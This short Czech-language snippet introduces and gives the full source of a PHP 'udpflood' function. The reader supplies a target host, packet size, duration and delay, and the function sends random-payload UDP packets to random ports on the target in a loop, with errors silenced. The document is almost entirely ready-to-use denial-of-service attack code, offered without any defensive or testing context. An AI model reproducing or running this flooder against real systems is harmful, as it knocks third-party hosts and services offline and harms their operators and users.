Ukázka jednoduché UDP flood funkce. Stačí zadat cílovou adresu, velikost každého packetu, trvání v sekundách a časovou prodlevu v sekundách mezi dvěmi odesláními.

function udpflood($host, $packetsize, $time, $delay){
 $packet = "";
 
 // Creating a packet
 for($i = 0; $i < $packetsize; $i++)
  $packet .= chr(mt_rand(1, 256)); 
 
 // starting time
 $time_start = time();
 
 while((time() - $time_start) < $time){
  // packet is sent to a random port
  $fp = @fsockopen("udp://" . $host, mt_rand(0, 10000), $e, $s, 5);
  @fwrite($fp, $packet);
  @fclose($fp);
  sleep($delay);
 }
}